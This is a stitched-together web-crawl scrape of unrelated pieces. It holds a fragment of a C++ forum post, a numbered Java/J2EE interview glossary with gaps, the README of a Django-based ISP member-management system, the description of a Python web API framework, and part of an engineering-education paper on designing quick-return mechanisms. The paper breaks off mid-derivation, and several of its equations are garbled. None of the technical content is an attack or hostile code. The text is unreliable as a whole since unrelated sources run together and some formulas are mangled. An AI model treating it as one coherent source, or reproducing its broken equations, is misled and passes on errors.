    //return "chan1";
}

I did include <string> in the header too.

thanks
http://derivative.ca/Forum/viewtopic.php?f=27&t=11949&p=46443&sid=a73d84ab7817a4feb25b9f223a90c806
CC-MAIN-2019-04
en
refinedweb
Advanced Java Interview Questions - 16

5. What is error? A SAX parsing error is generally a validation error; in other words, it occurs when an XML document is not valid, although it can also occur if the declaration specifies an XML version that the parser cannot handle. See also fatal error, warning.
6. What is Extensible Markup Language? XML.
7. What is external entity? An entity that exists as an external XML file, which is included in the XML document using an entity reference.
8. What is external subset? That part of a DTD that is defined by references to external DTD files.
9. What is fatal error? A fatal error occurs in the SAX parser when a document is not well formed or otherwise cannot be processed. See also error, warning.
11. What is filter chain? A concatenation of XSLT transformations in which the output of one transformation becomes the input of the next.
12. What is finder method? A method defined in the home interface and invoked by a client to locate an entity bean.
13. What is form-based authentication? An authentication mechanism in which a Web container provides an application-specific form for logging in. This form of authentication uses Base64 encoding and can expose user names and passwords.
14. What is general entity? An entity that is referenced as part of an XML document's content, as distinct from a parameter entity, which is referenced in the DTD. A general entity can be a parsed entity or an unparsed entity.
15. What is group? An authenticated set of users classified by common traits such as job title or customer profile. Groups are also associated with a set of roles, and every user that is a member of a group inherits all the roles assigned to that group.
16. What is handle? An object that identifies an enterprise bean. A client can serialize the handle and then later deserialize it to obtain a reference to the enterprise bean.
17. What is home handle? An object that can be used to obtain a reference to the home interface. A home handle can be serialized and written to stable storage and deserialized to obtain the reference.
18. What is home interface? One of two interfaces for an enterprise bean. The home interface defines zero or more methods for managing an enterprise bean. The home interface of a session bean defines create and remove methods, whereas the home interface of an entity bean defines create, finder, and remove methods.
19. What is Java 2 Platform, Micro Edition (J2ME)? A highly optimized Java runtime environment targeting a wide range of consumer products, including pagers, cellular phones, screen phones, digital set-top boxes, and car navigation systems.
20. What is Java 2 Platform, Standard Edition (J2SE)? The core Java technology platform.
22. What is Java API for XML Registries (JAXR)? An API for accessing various kinds of XML registries.
23. What is Java API for XML-based RPC (JAX-RPC)? An API for building Web services and clients that use remote procedure calls and XML.
24. What is J2SE? Abbreviation of Java 2 Platform, Standard Edition.
25. What is JAR? Java archive. A platform-independent file format that permits many files to be aggregated into one file.
26. What is Java 2 Platform, Enterprise Edition (J2EE)? An environment for developing and deploying enterprise applications. The J2EE platform consists of a set of services, application programming interfaces (APIs), and protocols that provide the functionality for developing multitiered, Web-based applications.
27. What is Java IDL? A technology that provides CORBA interoperability and connectivity capabilities for the J2EE platform. These capabilities enable J2EE applications to invoke operations on remote network services using the Object Management Group IDL and IIOP.
28. What is Java Message Service (JMS)? An API for invoking operations on enterprise messaging systems.
29. What is Java Transaction Service (JTS)? Specifies the implementation of a transaction manager that supports JTA and implements the Java mapping of the Object Management Group Object Transaction Service 1.1 specification at the level below the API.
30. What is JavaBeans component? A Java class that can be manipulated by tools and composed into applications. A JavaBeans component must adhere to certain property and event interface conventions.
31. What is JavaMail? An API for sending and receiving email.
32. What is JavaServer Faces Technology? A framework for building server-side user interfaces for Web applications written in the Java programming language.
33. What is JavaServer Faces conversion model? A mechanism for converting between string-based markup generated by JavaServer Faces UI components and server-side Java objects.
34. What is JavaServer Faces event and listener model? A mechanism for determining how events emitted by JavaServer Faces UI components are handled. This model is based on the JavaBeans component event and listener model.
35. What is Java Transaction API (JTA)? An API that allows applications and J2EE servers to access transactions.
36. What is JavaServer Faces UI component? A user interface control that outputs data to a client or allows a user to input data to a JavaServer Faces application.
37. What is JavaServer Faces UI component class? A JavaServer Faces class that defines the behavior and properties of a JavaServer Faces UI component.
38. What is Java Naming and Directory Interface (JNDI)? An API that provides naming and directory functionality.
39. What is Java Secure Socket Extension (JSSE)? A set of packages that enable secure Internet communications.
40. What is JAXR client? A client program that uses the JAXR API to access a business registry via a JAXR provider.
43. What is JMS? Java Message Service.
44. What is JMS administered object? A preconfigured JMS object (a resource manager connection factory or a destination) created by an administrator for the use of JMS clients and placed in a JNDI namespace.
45. What is JMS application? One or more JMS clients that exchange messages.
46. What is JAXR provider? An implementation of the JAXR API that provides access to a specific registry provider or to a class of registry providers that are based on a common specification.
47. What is JDBC? An API for database-independent connectivity between the J2EE platform and a wide range of data sources.
48. What is JavaServer Faces validation model? A mechanism for validating the data a user inputs to a JavaServer Faces UI component.
49. What is JMS client? A Java language program that sends or receives messages.
50. What is JMS provider? A messaging system that implements the Java Message Service as well as other administrative and control functionality needed in a full-featured messaging product.
51. What is JSP expression? A scripting element that contains a valid scripting language expression that is evaluated, converted to a String, and placed into the implicit out object.
52. What is JSP expression language? A language used to write expressions that access the properties of JavaBeans components. EL expressions can be used in static text and in any standard or custom tag attribute that can accept an expression.
53. What is JSP standard action? An action that is defined in the JSP specification and is always available to a JSP page.
55. What is JSP page? A text-based document containing static text and JSP elements that describes how to process a request to create a response. A JSP page is translated into, and handles requests as, a servlet.
57. What is JSP scriptlet? A JSP scripting element containing any code fragment that is valid in the scripting language used in the JSP page. The JSP specification describes what is a valid scriptlet for the case where the language page attribute is "java".
58. What is local subset? That part of the DTD that is defined within the current XML file.
59. What is managed bean creation facility? A mechanism for defining the characteristics of JavaBeans components used in a JavaServer Faces application.
60. What is JTA? Abbreviation of Java Transaction API.
61. What is JSP tag file? A source file containing a reusable fragment of JSP code that is translated into a tag handler when a JSP page is translated into a servlet.
62. What is JSP tag handler? A Java programming language object that implements the behavior of a custom tag.
63. What is JSP tag library? A collection of custom tags described via a tag library descriptor and Java classes.
64. What is JSTL? Abbreviation of JavaServer Pages Standard Tag Library.
65. What is JTS? Abbreviation of Java Transaction Service.
66. What is keystore? A file containing the keys and certificates used for authentication.
69. What is message consumer? An object created by a JMS session that is used for receiving messages sent to a destination.
71. What is message producer? An object created by a JMS session that is used for sending messages to a destination.
72. What is mixed-content model? A DTD specification that defines an element as containing a mixture of text and one or more other elements. The specification must start with #PCDATA, followed by diverse elements, and must end with the "zero-or-more" asterisk symbol (*).
73. What is mutual authentication? An authentication mechanism employed by two parties for the purpose of proving each other's identity to one another.
74. What is namespace? A standard for qualifying element names uniquely, so that an element should be interpreted according to your DTD rather than using the definition for an element in a different DTD.
75. What is naming context? A set of associations between unique, atomic, people-friendly identifiers and objects.
76. What is parameter entity? An entity that consists of DTD specifications, as distinct from a general entity. A parameter entity defined in the DTD can then be referenced at other points, thereby eliminating the need to recode the definition at each location it is used.
77. What is parsed entity? A general entity that contains XML and therefore is parsed when inserted into the XML document, as opposed to an unparsed entity.
80. What is North American Industry Classification System (NAICS)? A system for classifying business establishments based on the processes they use to produce goods or services.
81. What is notation? A mechanism for defining a data format for a non-XML document referenced as an unparsed entity. This is a holdover from SGML. A newer standard is to use MIME data types and namespaces to prevent naming conflicts.
82. What is method-binding expression? A JavaServer Faces EL expression that refers to a method of a backing bean. This method performs either event handling, validation, or navigation processing for the UI component whose tag uses the method-binding expression.
83. What is method permission? An authorization rule that determines who is permitted to execute one or more enterprise bean methods.
84. What is OASIS? Organization for the Advancement of Structured Information Standards. A consortium that drives the development, convergence, and adoption of e-business standards.
85. What is OMG? Object Management Group. A consortium that produces and maintains computer industry specifications for interoperable enterprise applications.
86. What is one-way messaging? A method of transmitting messages without having to block until a response is received.
87. What is ORB? Object request broker. A library that enables CORBA objects to locate and communicate with one another.
88. What is OS principal? A principal native to the operating system on which the J2EE platform is executing.
89. What is OTS? Object Transaction Service. A definition of the interfaces that permit CORBA objects to participate in transactions.
91. What is passivation? The process of transferring an enterprise bean from memory to secondary storage. See activation.
92. What is persistence? The protocol for transferring the state of an entity bean between its instance variables and an underlying database.
93. What is persistent field? A virtual field of an entity bean that has container-managed persistence; it is stored in a database.
94. What is primary key? An object that uniquely identifies an entity bean within a home.
95. What is principal? The identity assigned to a user as a result of authentication.
96. What is privilege? A security attribute that does not have the property of uniqueness and that can be shared by many principals.
97. What is POA? Portable Object Adapter. A CORBA standard for building server-side applications that are portable across heterogeneous ORBs.
98. What is point-to-point messaging system? A messaging system built on the concept of message queues. Each message is addressed to a specific queue; clients extract messages from the queues established to hold their messages.
99. What is processing instruction? Information contained in an XML structure that is intended to be interpreted by a specific application.
100. What is programmatic security? Security decisions that are made by security-aware applications. Programmatic security is useful when declarative security alone is not sufficient to express the security model of an application.
101. What is prolog? The part of an XML document that precedes the XML data. The prolog includes the declaration and an optional DTD.
104. What is RAR? Resource Adapter Archive. A JAR archive that contains a resource adapter module.
105. What is RDF? Resource Description Framework. A standard for defining the kind of data that an XML file contains. Such information can help ensure semantic integrity, for example, by helping to make sure that a date is treated as a date rather than simply as text.
106. What is RDF schema? A standard for specifying consistency rules that apply to the specifications contained in an RDF.
108. What is reentrant entity bean? An entity bean that can handle multiple simultaneous, interleaved, or nested invocations that will not interfere with each other.
110. What is query string? A component of an HTTP request URL that contains a set of parameters and values that affect the handling of the request.
111. What is queue? A messaging system built on the concept of message queues. Each message is addressed to a specific queue; clients extract messages from the queues established to hold their messages.
112. What is registry? An infrastructure that enables the building, deployment, and discovery of Web services. It is a neutral third party that facilitates dynamic and loosely coupled business-to-business (B2B) interactions.
113. What is remove method? A method defined in the home interface and invoked by a client to destroy an enterprise bean.
114. What is render kit? A set of renderers that render output to a particular client. The JavaServer Faces implementation provides a standard HTML render kit, which is composed of renderers that can render HTML markup.
115. What is registry provider? An implementation of a business registry that conforms to a specification for XML registries (for example, ebXML or UDDI).
116. What is relationship field? A virtual field of an entity bean having container-managed persistence; it identifies a related entity bean.
117. What is remote interface? One of two interfaces for an enterprise bean. The remote interface defines the business methods callable by a client.
118. What is renderer? A Java class that can render the output for a set of JavaServer Faces UI components.
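To make the JSP-related entries (51, 52 and 57) concrete, here is a tiny illustrative JSP fragment (an addition for illustration; it is not part of the original question set, and the customer bean is hypothetical):

<%-- JSP scriptlet (entry 57): an arbitrary code fragment in the page's scripting language --%>
<% int count = 3; %>

<%-- JSP expression (entry 51): evaluated, converted to a String, placed into the implicit out object --%>
Count is: <%= count %>

<%-- JSP expression language (entry 52): accesses a property of a JavaBeans component --%>
Name is: ${customer.name}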
http://www.lessons99.com/advanced-java-interview-questions-16.html
CC-MAIN-2019-04
en
refinedweb
Information system of the ISP ARN (based on that of ...).

Create a virtualenv:

virtualenv ./venv

To activate the virtualenv (you need to do this each time you work on the project):

source ./venv/bin/activate

Install dependencies. On Debian, you will probably need the python-dev, python-pip, libldap2-dev, libpq-dev, libsasl2-dev, and libjpeg-dev packages:

sudo apt install python-dev python-pip libldap2-dev libpq-dev libsasl2-dev libjpeg-dev libxml2-dev libxslt1-dev libffi-dev python-cairo libpango1.0-0

You need a recent pip for the installation of dependencies to work. If you don't meet that requirement (Ubuntu trusty does not), run:

pip install "pip>=1.5.6"

In any case, you then need to install coin's python dependencies:

pip install -r requirements.txt

See the end of this README for a reference of available configuration settings.

At this point, you should set up your database. You have two options.

The official database for coin is PostgreSQL. To ease development, a PostgreSQL virtual-machine recipe is provided through Vagrant.

Note: Vagrant is intended for development only and is totally unsafe for a production setup.

Install requirements:

sudo apt install virtualbox vagrant

Then, to boot and configure your dev VM:

vagrant up

Default settings target that Vagrant + PostgreSQL setup, so you don't have to change any setting.

SQLite setup may be simpler, but some features will not be available, namely: ...

To use SQLite instead of PostgreSQL, you have to override local settings with something like:

DATABASES = {
    # Information system (SI) database
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        'NAME': 'coin.sqlite3',
        'USER': '',      # Not needed for SQLite
        'PASSWORD': '',  # Not needed for SQLite
        'HOST': '',      # Empty for localhost through domain sockets
        'PORT': '',      # Empty for default
    },
}

The first time, you need to create the database, create a superuser, and import some base data to play with:

python manage.py migrate
python manage.py createsuperuser
python manage.py loaddata offers ip_pool  # skip this if you don't use PostgreSQL

There is a set of unit tests you can run with:

DJANGO_SETTINGS_MODULE=coin.settings_test ./manage.py test

LDAP-related tests are disabled by default. Set up the LDAP parameters and activate LDAP in settings to make the LDAP tests run.

Setup:

pip install pytest-django

Run:

pytest

More filters are available; see the command's help for more details.

Some management commands are available:

- python manage.py offer_subscriptions_count: returns subscription counts grouped by offer type.
- python manage.py import_payments_from_csv: imports a CSV from a bank and matches payments with services and/or members. At the moment, this is quite specific to the ARN workflow.

Lastly, it is possible to override all Coin templates (i.e. for user views and emails); see below.

Coin sends mails; you might want to customize the sender address:

- DEFAULT_FROM_EMAIL: app-wide setting
- DEFAULT_FROM_EMAIL for administrative emails (welcome email and membership fees), will take precedence (if filled)

You may want to override some of the (HTML or email) templates to better suit your structure's needs. Coin allows you to have a folder of custom templates that will contain your templates, which gets loaded prior to coin builtins. With this method, several templates can be overridden:

- the directories listed in the EXTRA_TEMPLATE_DIRS setting
- coin/templates/
- coin/<app_name>/templates/ for all active applications

For instance, in settings_local.py:

EXTRA_TEMPLATE_DIRS = ('/home/coin/my-folder/templates',)

Copy the template you want to override to the right place in your custom folder (that's the hard part, see the example).

Example

Say we want to override the template located at coin/members/templates/members/emails/call_for_membership_fees.html and we set EXTRA_TEMPLATE_DIRS = ('/home/coin/my-folder/templates',) in settings. Then make a copy of the template file (and customize it) at /home/coin/my-folder/templates/members/emails/call_for_membership_fees.html

Good to go :-)

Some apps are not enabled by default. You can enable them using the EXTRA_INSTALLED_APPS setting. E.g. in settings_local.py:

EXTRA_INSTALLED_APPS = (
    'vpn',
)

If you enable an extra app after initial installation, make sure to sync the database:

./manage.py migrate

nb: extra apps are loaded after the builtin apps.

List of available settings in your settings_local.py file:

- EXTRA_INSTALLED_APPS: see Customizing the app list
- EXTRA_TEMPLATE_DIRS: see Customizing templates
- LDAP_ACTIVATE: see LDAP
- MEMBER_MEMBERSHIP_INFO_URL: link to a page with information on how to become a member or pay the membership fee
- SUBSCRIPTION_REFERENCE: pattern used to display a unique reference for any subscription; helpful for bank wire transfer identification
- REGISTRATION_OPEN: allow visitors to join the association by registering on COIN
- ACCOUNT_ACTIVATION_DAYS: accounts with an unvalidated email will be deleted after this many days
- MEMBERSHIP_REFERENCE: template string for the label the member should indicate for the bank transfer; default: "ADH-{{ user.pk }}"
- DEFAULT_MEMBERSHIP_FEE: default membership fee; if you have a more complex membership-fee policy, you can override the templates
- PAYMENT_DELAY: payment delay in days for issued invoices (default is 30 days, which is the default in French law)
- MEMBER_CAN_EDIT_PROFILE: allow members to edit their profiles
- HANDLE_BALANCE: handle money balances for members (False by default)
- INVOICES_INCLUDE_CONFIG_COMMENTS: add comments related to a subscription configuration when generating invoices
- MEMBER_CAN_EDIT_VPN_CONF: allow members to edit some parts of their VPN configuration
- DEBUG: enable debug for development; do not use in production (displays stack traces and enables django-debug-toolbar)

To log accounting-related operations (creation/update of invoices, payments and member balances) to a specific file, add the following to settings_local.py:

from settings_base import *

LOGGING["formatters"]["verbose"] = {'format': "%(asctime)s - %(name)s - %(levelname)s - %(message)s"}
LOGGING["handlers"]["coin_accounting"] = {
    'level': 'INFO',
    'class': 'logging.handlers.RotatingFileHandler',
    'formatter': 'verbose',
    'filename': '/var/log/coin/accounting.log',
    'maxBytes': 1024*1024*15,  # 15MB
    'backupCount': 10,
}
LOGGING["loggers"]["coin.billing"]["handlers"] = ['coin_accounting']

For the rest of the setup (database, LDAP), see ...

For real production deployment, see the file DEPLOYMENT.md.
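As an illustration, a minimal settings_local.py assembled from the settings documented above might look like this (a sketch, not taken from the repo; the URL and values are placeholders):

# settings_local.py -- minimal example assembled from the settings above
from settings_base import *

DEBUG = False

# business settings
MEMBER_MEMBERSHIP_INFO_URL = 'https://example.org/join'  # hypothetical URL
DEFAULT_MEMBERSHIP_FEE = 20
PAYMENT_DELAY = 30
REGISTRATION_OPEN = True

# enable optional apps and custom templates
EXTRA_INSTALLED_APPS = ('vpn',)
EXTRA_TEMPLATE_DIRS = ('/home/coin/my-folder/templates',)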
https://code.ffdn.org/ARN/coin
CC-MAIN-2019-04
en
refinedweb
A Web API Framework (with Django, ...)

A Web API Framework. Currently only supports Django, but designed to work for other frameworks with some modification. At some point, other framework support will be built in directly.

Purpose

krankshaft was designed to make the frustrating and unnecessarily complicated parts of Web APIs simple and beautiful by default. It's built in layers that allow the programmer to easily opt in or out. From "Expose this model via a web api and handle all the details" to "hands off my API, I'll opt into the basics as I need them".

krankshaft is meant to be a framework to build Web APIs and grow with your application.

Goals:

- simple and concise
- keep the simple things simple
- enable complex APIs without getting in the way
- HTTP return codes are important, don't abstract them away
- fail early
- performance
- no global state
- easily extendable
- suggests a pattern, but doesn't restrict you to it
- secure by default

Example

This is just a suggested file structure; there is no limitation here.

In app/apiv1.py:

from django.conf import settings
from krankshaft import API

apiv1 = API('v1', debug=settings.DEBUG)

In app/views.py:

from app.apiv1 import apiv1 as api

@api
def view(request):
    return api.serialize(request, 200, {
        'key': 'value'
    })

At this point, you'll still need to wire up the common routing for your framework. In Django, it looks something like this.

In app/urls.py:

from django.conf.urls import patterns, include, url

urlpatterns += patterns('app.views',
    url('^view/$', 'view'),
)

Resource example

In app/api.py:

from django.conf import settings
api = API('v1', debug=settings.DEBUG)

@api(url='^model/(?P<id>\d+)/$')
class ModelResource(object):
    def get(self, request, id):
        ...

    def put(self, request, id):
        ...

    def delete(self, request, id):
        ...

In app/urls.py:

from django.conf.urls import patterns, include, url
from .api import api

urlpatterns = patterns('',
    url('^api/', include(api.urls)),
)

This enables clients to make GET/PUT/DELETE requests to the endpoint:

/api/v1/model/<id>/

If a POST is made, the client will receive the proper 405 response with the Allow header set to GET, PUT, DELETE.

You can customize resources even more. You can define your own routing scheme:

class ModelResource(object):
    ...

    def route(self, request, id):
        # this is approximately the default
        try:
            view = getattr(self, request.method.lower())
        except AttributeError:
            return api.response(request, 405)
        else:
            return view(request, id)

Or set up urls and multiple routes:

class ModelResource(object):
    ...

    def get_list(self, request):
        ...

    def post_list(self, request):
        ...

    def put_list(self, request):
        ...

    def delete_list(self, request):
        ...

    def query(self, request):
        if request.method != 'POST':
            return api.response(request, 405, Allow='POST')
        ...

    def route(self, suffix, request, *args, **kwargs):
        # this is approximately the default
        try:
            view = getattr(self, request.method.lower() + suffix)
        except AttributeError:
            return api.response(request, 405)
        else:
            return view(request, *args, **kwargs)

    def route_list(self, request):
        return self.route('_list', request)

    def route_object(self, request, id):
        return self.route('', request, id)

    @property
    def urls(self):
        from django.conf.urls import patterns, url
        return patterns('',
            url(r'^model/$', api.wrap(self.route_list)),
            url(r'^model/query/$', api.wrap(self.query)),
            url(r'^model/(?P<id>\d+)/$', api.wrap(self.route_object)),
        )

Or (instead of building your own) use the one built in:

from krankshaft.resource import DjangoModelResource
from app.models import Model
from app.api import api

@api
class ModelResource(DjangoModelResource):
    model = Model

This resource implementation should be ideal for most situations, but you're free to reimplement parts or all of it. It's meant only as a pattern you can follow and is not required by the framework at all.

What works:

- simple authentication/authorization schemes (not OAuth at the moment)
- serialization of primitive types respecting the HTTP Accept header
- abort (raise-like HTTP response return)
- throttling
- resource routing
- query application (i.e.: ?field__startswith=something&order_by=field) with pagination support
- deep data validation
- Django ORM based Model Resource (with model serialization/deserialization)
- Optimistic Concurrency Control option (version_field)

Todo:

- auto-documenting based on doc strings (plus bootstrap interactive UI)
- caching
- easy-etag support
- flask support
- OAuth (1 and 2)
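As a quick illustration of the query application listed under "What works" (a hypothetical request against the ModelResource above; "name" is an assumed field, and the filter syntax mirrors the ?field__startswith example given there):

curl 'http://localhost:8000/api/v1/model/?name__startswith=foo&order_by=name'

A GET like this would return a serialized, paginated list of the matching Model instances.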
https://pypi.org/project/krankshaft/0.2.7/
CC-MAIN-2019-04
en
refinedweb
This action might not be possible to undo. Are you sure you want to continue? Ron P. Podhorodeski, Scott B. Nokleby and Jonathan D. Wittchen Robotics and Mechanisms Laboratory, Department of Mechanical Engineering, University of Victoria, PO Box 3055, Victoria, British Columbia, Canada, V8W 3P6 E-mail: [email protected]; [email protected]; [email protected] Abstract first. Keywords mechanism projects; design; analysis; synthesis Introduction Quick-return mechanisms Quick-return (QR) mechanisms feature different input durations for their working and return strokes. The time ratio (TR) of a QR mechanism is the ratio of the change in input displacement during the working stroke to its change during the return stroke. QR mechanisms are used in shapers, power-driven saws, and many other applications requiring a load-intensive working stroke in comparison to a low-load return stroke [1–3]. Several basic types of mechanism have a QR action. These include slider-crank mechanisms (e.g., see the offset slider-crank mechanism in Fig. 1a and the inverted slider-crank mechanisms, including the crank-shaper mechanism, in Fig. 1b and the Whitworth in Fig. 1c) and four-bar mechanisms (e.g., see the crank-rocker-driven piston in Fig. 2a and the drag-link-driven piston in Fig. 2b). Mechanism analysis techniques taught in a first course on the theory of mechanisms can be applied to evaluate the performance of QR mechanisms. Design of a mechanism, on the other hand, requires determining a mechanism to perform a desired task. For example, synthesis of a reciprocating QR device requires determination of a mechanism to produce a desired TR and a necessary stroke. Note that there is not necessarily a unique mechanism design for a particular task: many mechanism types (e.g., offset slider-crank, Whitworth, drag-link, etc.) may be capable of performing it. Even within one mechanism type, many different link-length combinations (perhaps an infinity of several dimensions [1]) may perform the required task. Choosing a type of mechanism for a task is called type synthesis. Selecting link lengths for a chosen type is referred to as dimensional synthesis [1–3]. When many International Journal of Mechanical Engineering Education 32/2 The task of a QR mechanism is simple to understand. etc. for example. mechanisms of various types and/or dimensions that satisfy the primary task exist. of minimum transmission angles. physical modelling. iterative.Quick-return mechanisms 101 Fig. Several techniques can be considered and developed by students to achieve the required synthesis task. Having a laboratory manual that briefly outlines different possible techniques.. and leaves the International Journal of Mechanical Engineering Education 32/2 . For example. graphical. minimum transmission angles. can be considered to isolate a preferred design. Several concepts of design and analysis can be illustrated by a QR mechanism project. (b) crank-shaper. of type and dimensional synthesis. and of computer-aided modelling programs. and analytical techniques can all be used to synthesize a desired mechanism. students can be exposed to concepts of kinematic analysis. (c) Whitworth. maximum accelerations. concerns such as mechanism size. 1 Slider-crank QR mechanisms: (a) offset slider-crank. AUs are assigned to the curriculum content of the courses within the program under consideration. Podhorodeski et al. and has allowed the assignment to the course of a significant percentage of accreditation units (AUs) for Engineering design [4]. 
student-applied technique open.1 The project described in this work is assigned to and completed by the students within the first four weeks of a first course on mechanism analysis. (b) draglink (crank-crank) as the driving mechanism. requires a creative algorithm-design process. the projects are strong on the creative. . Over the past 10 years at the Department of Mechanical Engineering. iterative and often open-ended process subject to constraints. It is a creative. basic sciences. (d) engineering design. This course occurs in the first term of third year. systems and processes to meet specific needs. along with similar technique-open projects on inertia modelling and on cam design. engineering sciences and complementary studies in developing elements. and subject-to-constraints aspects. Fig. has given the students a strong appreciation of mechanism analysis and design issues. P.’ While not strong on the complementary aspect. International Journal of Mechanical Engineering Education 32/2 . a variety of projects featuring different mechanism types have been used within a first course on the theory of mechanisms. 1 The Canadian Engineering Accreditation Board (CEAB) performs accreditation of all undergraduate engineering programmes in Canada. open-ended. (b) basic sciences. Currently AUs are divided between (a) mathematics. 2 Four-bar QR mechanisms: (a) crank-rocker as the driving mechanism. Quoting CEAB Accreditation Criteria and Procedures [4]: ‘Engineering design integrates mathematics. The QR project.102 R. . of a semestered four-year academic programme that leads to an accredited bachelor of engineering in mechanical engineering degree. iterative. . University of Victoria. and (e) complementary studies. (c) engineering sciences. 2b depicts a QR mechanism driven by a drag-link (also known as a crank-crank) linkage.Quick-return mechanisms 103 Outline of the content of the remaining sections First. 1b illustrates a typical configuration. 2a shows a piston being driven by the follower of a crank-rocker four-bar linkage. Quick-return mechanism types and synthesis techniques Example QR mechanisms Consider the offset slider-crank illustrated in Fig. a ‘cardboard and pin’ model) is made and the output for a given input is directly measured. Fig. Design of QR mechanisms After choosing a mechanism type. 1c) is formed when the crank of the slider-crank inversion is greater than the base distance. Note that the project requires application of analysis techniques taught very early within a first course on the theory of mechanisms. BDC). The subsequent section presents a typical set of requirements for the QR project. The crank length of a crank-shaper is less than the base length (O2 to O4) of the mechanism. types of QR mechanisms and potential techniques for their synthesis are reviewed. a scale model (e.g. Fig. Several techniques can be applied. appropriate dimensions for the desired task must be selected. requires the development of relevant synthesis techniques. moves from C¢ (top-dead-centre. where again the crank (member 2) is rotating counter-clockwise. From the oscillation extremes of the follower. The time ratio (TR) is given by: TR = a b (1) A crank-shaper is comprised of a tool driven by an inverted slider-crank. Examples of solution techniques that have been used to solve portions of the QR project are then presented. TDC) to C≤ (bottom-dead-centre. Notice that the follower (member 4) of the Whitworth is dragged through a full rotation during a revolution of the crank. Fig. 
1c) define the values of a and b. 2b). C. The crank displacements when the follower is parallel to the sliding direction (horizontal in Fig. 1c illustrates a Whitworth QR mechanism. 1a. As the piston moves from BDC to TDC the crank rotates a displacement b (B≤ to B¢). the crank positions B¢ to B≤ are defined. The graphical technique involves drawing the mechanism in its various positions. A Whitworth mechanism (Fig. The most basic techniques are physical modelling and graphical. The extreme positions of the piston occur when the follower direction is parallel to the sliding direction (horizontal in Fig. and exposes students to the application of computer-based algorithms for the analysis of mechanisms. The crank displacements at these extremes define the values of a and b for the device’s TR. In physical modelling. The crank (member 2) is rotating clockwise and rotates a displacement a (B¢ to B≤) as the piston. International Journal of Mechanical Engineering Education 32/2 . The paper closes with further considerations and conclusions. Fig. Notice that the crank (member 2) is rotating counter-clock wise in this case and that the follower (member 4) of the driving mechanism (the inverted slider-crank) oscillates between two extremes. 1000 m. for the four-bar and to relocate pin C (length r5) on the follower to create a mechanism capable of performing the task requirements. 3. However.104 R. that it is not always possible to derive a closed-form solution for link lengths as a function of a desired TR. The length of the slider’s coupler is CD = r6 = 0. Furthermore.3000 m. however. An alternative is to derive analytical expressions for the mechanism lengths required for a desired TR. An example quick-return project The idea of this project is to expose students to concepts of mechanism synthesis and to provide a practical problem where analytical. 3 Layout of drag-link QR mechanism. but allows for modification of the project from year to year. if a closed-form solution for the displacements of the driving mechanism can be found. It should be noted that any QR mechanism type can be substituted for the presented drag-link-based one. a solution of the TR for given link lengths can be found iteratively. graphical. Example problem background An application requires a QR mechanism with TR = 1. Searching over the feasible link lengths allows mechanisms having desired TRs to be resolved.2750 m. An example project problem.2250 m. and length of follower O4B = r4 = 0.300 m. Podhorodeski et al. The current lengths of the drag-link mechanism are: distance between fixed centres O2 and O4 = r1 = 0. length of coupler AB = r3 = 0. It is proposed to design a new coupler.1000 m from O4. P. due to the nonlinear from of the TR solution. and the commercial program Working Model® [6]. it is suggested that the coupler should be adjustable in length for future modification of the drag-link-based QR for other TRs. for designing a drag-link-based QR mechanism. is given below. a program developed at the University of Manitoba and the University of Toronto. International Journal of Mechanical Engineering Education 32/2 .3000 m and it is connected a distance O4C = r5 = 0. The current drag-link crank and follower are made of cast iron and would be expensive to modify.500 and a stroke of 0. AB (length r3). length of crank O2A = r2 = 0. Currently a drag-link-based QR mechanism exists. as illustrated in Fig. Substituting different mechanism types allows the teaching objectives of the project to remain the same. Note. 
and computer-aided analysis techniques can be applied. Available for this project are two mechanism analysis programs: GNLINK [5]. Physical modelling and graphical solutions are time consuming and can be inaccurate. Fig. Quick-return mechanisms 105 Example project requirements Design (1) Determine a coupler link length (r3) and C pin location (r5) satisfying a TR = 1.500 and stroke = 0.500 and stroke = 0. and the coupler length could be changed? (4) Discuss the issues you would consider in the isolation of a unique mechanism design. Analysis For the mechanism with TR = 1. The following equations can be derived using cosine law: Fig. TR and stroke solutions for known link lengths The TDC and BDC positions of the piston occur when the follower of the drag-link four-bar mechanism is aligned with the sliding direction. using relative motion analysis (polygons).3000 m while maintaining the other current link lengths. International Journal of Mechanical Engineering Education 32/2 . Fig.0 rad/s2 for this analysis. The solutions presented are examples of various ways that past students have solved portions of the project.0 rad/s and a2 = 0. Use w2 = 10. (2) Determine the range of (r3) that the adjustable coupler should accommodate to allow the maximum number of drag-link-based TRs to be created. (3) Simulate the mechanism for a complete revolution of the input crank. 4 illustrates these two positions. Examples of quick-return project solutions Examples of solutions for various portions of the problem set out above are given in this section. O2O4.3000 m: (1) Evaluate the velocity and acceleration of the slider when q2 = 60 °. 4 Drag-link mechanism at TDC and BDC. (2) Check this result using the program GNLINK or Working Model®. Discussion issues (1) How many mechanisms providing a specific TR are possible if only r3 is varied? (2) What is the range of TR that would be possible by adjusting the length of the coupler? (3) How many feasible mechanism solutions would exist for a given TR if both the base length. depending on the value of r3.: rshort + rlong £ ra + rb and rshort = r1 (6) where rshort and rlong are the lengths of the shortest and the longest links. For TDC: r 2 = r 2 + (r4 + r1 ) . In summary. the feasible range of r3 can be found considering Grashof’s criteria [7] for a drag-link four-bar.1)p = q 2a + f TR + 1 (7) with f being equal to (TR .2250 + r3 and therefore 0. examination of the data indicates that TR values ranging 1. i. O4C = 0. i.q 2a + q 2 b = b p + q 2a . one.2250 m. 5.1000 m.r1 ) .1 + r3 0.2 r2 (r4 . Similarly.2750 0. Analysis of the values of the TR over the feasible r3 range using the given values of r1 = 0. For the project problem. stroke = 2 * O4C.. r2. there are either zero.1 + 0.e.r1 ) cos(q 2 b ) 2 3 2 2 2 2 (2a) (2b) Solving for q2a and q2b in the expressions for TDC and for BDC yields: q 2 a = cos -1 (r 2 + (r4 + r1 ) . is a solution for the TR of the device for known link lengths. Iterative solution for the value of r3 Equation (5).r 2 ) (2 r2 (r4 3 2 ) .2750 m yields the TR values illustrated in Fig.250 m. combined with equations (3a) and (3b). the duration of the working stroke is: a = p .r 2 ) (2 r2 (r4 + r1 )) 2 3 2 q 2 b = cos -1 ( ((r 2 2 + (r4 . For the given length values.538 can be achieved.a.106 R. For a desired TR. Podhorodeski et al.q 2a + q 2 b Since b = 2p .2 r2 (r4 + r1 ) cos(q 2 a ) 3 2 For BDC: r = r + (r4 .15 £ r3.500. r2 = 0. Searching the TR data used to create Fig. rlong will be equal to either r3 or r4. r4 = 0.2250 + 0.e. 
